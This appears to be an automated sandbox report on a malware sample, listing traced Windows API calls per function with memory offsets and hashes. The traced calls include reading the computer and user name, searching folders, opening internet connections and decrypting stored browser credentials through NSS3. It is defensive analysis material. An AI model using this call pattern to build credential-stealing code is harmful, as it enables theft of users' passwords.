                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040A95A
                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040A96E
                                                                                                                                                                                                                                                • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                                • Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
                                                                                                                                                                                                                                                • Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                                                                                                                                                                • Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,04083B38), ref: 00404ED9
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: lstrcpy$lstrlen$lstrcat$InternetOpen
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3635112192-0
                                                                                                                                                                                                                                              • Opcode ID: 7cd8234a4abdb81a99944f9f6d451a59de705a0f1975fd9f1c7cd260678ca252
                                                                                                                                                                                                                                              • Instruction ID: 9f23dc4c71334aa449457ef7a0e8bbad4682aa92b3b7ddf60c673b4dae8ee631
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7cd8234a4abdb81a99944f9f6d451a59de705a0f1975fd9f1c7cd260678ca252
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FC9149729102049BCF14FBA1DC51EEE773DBF54308F41425EF50666091EF38AA89CBA9
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040AC1E
                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040AC32
                                                                                                                                                                                                                                                • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                                • Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
                                                                                                                                                                                                                                                • Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                                                                                                                                                                • Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,04083B38), ref: 00404ED9
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: lstrcpy$lstrlen$lstrcat$InternetOpen
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3635112192-0
                                                                                                                                                                                                                                              • Opcode ID: 5dd6e1886fe9a9aadc567094d83ba0008eab3b8b6066a721d99fb8c77c53bff9
                                                                                                                                                                                                                                              • Instruction ID: 57c8c1270dba92ae3db9aa8e51dd660502e79bf125d10b7c0566732e7217b02b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5dd6e1886fe9a9aadc567094d83ba0008eab3b8b6066a721d99fb8c77c53bff9
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C07153759102049BCF14FBA1DC52DEE7739BF54308F41422EF506A7191EF38AA89CBA9
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00411550
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ByteCharMultiWide
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 626452242-0
                                                                                                                                                                                                                                              • Opcode ID: 46fcbcde96b391d8a91c7de27c3ae99c7866997ac8e62baa93d065818f15697d
                                                                                                                                                                                                                                              • Instruction ID: 8f9af232e05b2939ec69b712380268a2006cbed21c6953bc19412128f28bf8b7
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 46fcbcde96b391d8a91c7de27c3ae99c7866997ac8e62baa93d065818f15697d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0641F770A00A289FDB24DB58CC95BDBB7B5BB48702F4091C9A618A72E0D7716EC6CF54
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(004067AE,004067AE,00003000,00000040), ref: 004060F6
                                                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,004067AE,00003000,00000040), ref: 00406143
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4275171209-0
                                                                                                                                                                                                                                              • Opcode ID: a813d0be407c7e97fb4ae0c443796924326960eff0d044c67b11f739482c465e
                                                                                                                                                                                                                                              • Instruction ID: 5341a9e810d76a35e886a0404415562c2a616bd51e9685e0b668c9c894d7d0dc
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a813d0be407c7e97fb4ae0c443796924326960eff0d044c67b11f739482c465e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8341DE34A00209EFCB54CF58C494BADBBB1FF44314F1482A9E95AAB395C735AA91CB84
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 00412ABA
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,04086868), ref: 00412AD8
                                                                                                                                                                                                                                                • Part of subcall function 00412570: wsprintfA.USER32 ref: 00412589
                                                                                                                                                                                                                                                • Part of subcall function 00412570: FindFirstFileA.KERNELBASE(?,?), ref: 004125A0
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: lstrcat$FileFindFirstFolderPathwsprintf
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2699682494-0
                                                                                                                                                                                                                                              • Opcode ID: ea1ffac3ae604c61d94c3ab08edcb0d871ee1865e913378f7efedfa2106ffca1
                                                                                                                                                                                                                                              • Instruction ID: bcc253f25bf78e1a0e90404f031f6467c50b05fa57c941630bc3dd144581bb5c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ea1ffac3ae604c61d94c3ab08edcb0d871ee1865e913378f7efedfa2106ffca1
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8701B97A900608B7CB24FBB0DC47EDA773D9B54705F404189B64956091EE78AAC4CBE5
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040110E,?,?,004136DC), ref: 00401073
                                                                                                                                                                                                                                              • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040110E,?,?,004136DC), ref: 004010B7
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Virtual$AllocFree
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2087232378-0
                                                                                                                                                                                                                                              • Opcode ID: 1fafdb83e91c72df66fc5e0dfbe5cc959ff82812f546fe48c521c8e5e261a801
                                                                                                                                                                                                                                              • Instruction ID: a2913bed729a6fe358320823385779fc3d8f71f1cc7b0a13f7ab4b92dd49de4a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1fafdb83e91c72df66fc5e0dfbe5cc959ff82812f546fe48c521c8e5e261a801
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 42F027B1641208BBE724DAF4AC59FAFF79CA745B05F304559F980E3390DA719F00CAA4
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(00000000,?,0040E9F4,?,00000000,?,00000000,0041D76E,0041D76B), ref: 0041549F
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AttributesFile
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                                                                                                                              • Opcode ID: d0ebe2fb72674ebe02027a203c9a5e23a0550e75489eb08aacc5631cf77d8e9a
                                                                                                                                                                                                                                              • Instruction ID: 7a99a0210fb0b6ed6de77f6d22eec219e0a4aedfc9bcf57955c7481c69c901e8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d0ebe2fb72674ebe02027a203c9a5e23a0550e75489eb08aacc5631cf77d8e9a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9BF01C70C00608EBCB10EF94C9457DDBB74AF44315F10829AD82957380DB395A85CB89
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B
                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FolderPathlstrcpy
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1699248803-0
                                                                                                                                                                                                                                              • Opcode ID: c4deb19243b673a040dfd5fdc436edaecc4a41164842cb033ff61c0adf53a60f
                                                                                                                                                                                                                                              • Instruction ID: a2db4f6e5da6e8fb8430e81bb17b8e7aa1674d593408b434fe95881a23a64460
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c4deb19243b673a040dfd5fdc436edaecc4a41164842cb033ff61c0adf53a60f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A8E01231A4034CABDB61DB90DC96FDD776C9B44B05F004295BA0C5A1C0DA70AB858BD1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00414400: GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
                                                                                                                                                                                                                                                • Part of subcall function 00414400: HeapAlloc.KERNEL32(00000000), ref: 00414414
                                                                                                                                                                                                                                                • Part of subcall function 00414400: GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C
                                                                                                                                                                                                                                                • Part of subcall function 004143C0: GetProcessHeap.KERNEL32(00000000,00000104,00401177,04083828,004136EB,0041D6E3), ref: 004143CD
                                                                                                                                                                                                                                                • Part of subcall function 004143C0: HeapAlloc.KERNEL32(00000000), ref: 004143D4
                                                                                                                                                                                                                                                • Part of subcall function 004143C0: GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC
                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00401186
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Heap$Process$AllocName$ComputerExitUser
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1004333139-0
                                                                                                                                                                                                                                              • Opcode ID: c5f9d553daa3d293cc675e83c5a49a4e0c2af81821706314cf681e3291f30800
                                                                                                                                                                                                                                              • Instruction ID: 69e00d56220517d966a61d162f3bbf9e0969f4784ba4f73569e39f9695f87914
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c5f9d553daa3d293cc675e83c5a49a4e0c2af81821706314cf681e3291f30800
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 78E012B5E1070462CA1573B27E06BD7729D5F9930EF40142AFE0497253FD2DE45145BD
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: malloc
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2803490479-0
                                                                                                                                                                                                                                              • Opcode ID: e14bb29f5c634f52acde74c2c6c6ee0589a433b3a794b1f7692ac0cd2af21e16
                                                                                                                                                                                                                                              • Instruction ID: 71a24ea012b18c325b39d17d5ea825459b0100de2daa219f1012b17ed67d7128
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e14bb29f5c634f52acde74c2c6c6ee0589a433b3a794b1f7692ac0cd2af21e16
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1CC012B090410CEB8B00CF98EC0588A7BECDB08200B0041A4FC0DC3300D631AE1087D5
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00412200
                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00412207
                                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00412223
                                                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 0041223A
                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041D84C), ref: 00412268
                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041D850), ref: 0041227E
                                                                                                                                                                                                                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 004122FF
                                                                                                                                                                                                                                              • FindClose.KERNEL32(000000FF), ref: 00412314
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,04083B88), ref: 00412339
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,04086AF8), ref: 0041234C
                                                                                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 00412359
                                                                                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 0041236A
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Find$FileHeaplstrcatlstrlen$AllocCloseFirstNextProcesswsprintf
                                                                                                                                                                                                                                              • String ID: %s\%s$%s\*
                                                                                                                                                                                                                                              • API String ID: 13328894-2848263008
                                                                                                                                                                                                                                              • Opcode ID: 92269801ec56706d49fbc1ad71996fa168eab42beab98886f9fc838609930503
                                                                                                                                                                                                                                              • Instruction ID: 68eafe57ffc654504e5fb8166b756e3a47007b1446461b295be9b39175aa6662
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 92269801ec56706d49fbc1ad71996fa168eab42beab98886f9fc838609930503
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5551A6B5940618ABCB20EBB0DC89FEE737DAB98300F404689F61A96150DF749BC5CF94
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040BFC3
                                                                                                                                                                                                                                              • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,040839A8), ref: 0040BFE1
                                                                                                                                                                                                                                              • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040BFEC
                                                                                                                                                                                                                                              • PK11_GetInternalKeySlot.NSS3 ref: 0040BFFA
                                                                                                                                                                                                                                              • PK11_Authenticate.NSS3(00000000,00000001,00000000), ref: 0040C015
                                                                                                                                                                                                                                              • PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 0040C05B
                                                                                                                                                                                                                                              • memcpy.MSVCRT ref: 0040C082
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041D726), ref: 0040C0B3
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041D727), ref: 0040C0C7
                                                                                                                                                                                                                                              • PK11_FreeSlot.NSS3(?), ref: 0040C0D1
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041D72A), ref: 0040C0E8
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: K11_lstrcat$Slot$AuthenticateBinaryCryptDecryptFreeInternalStringlstrlenmemcpymemset
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3428224297-0
                                                                                                                                                                                                                                              • Opcode ID: 52605990ea01bca17d675fac138a1e19a7de02da9981d5b01ff6e8c7352eb267
                                                                                                                                                                                                                                              • Instruction ID: c615a08a89d19efff62b5a0e6981dcd2a682f0599fa2db432923c9597831d409
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 52605990ea01bca17d675fac138a1e19a7de02da9981d5b01ff6e8c7352eb267
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 22417E75D0420ADBDB20CF90DD88BEEBBB9BB48340F1041A9E605A72C0DB745A84CF95
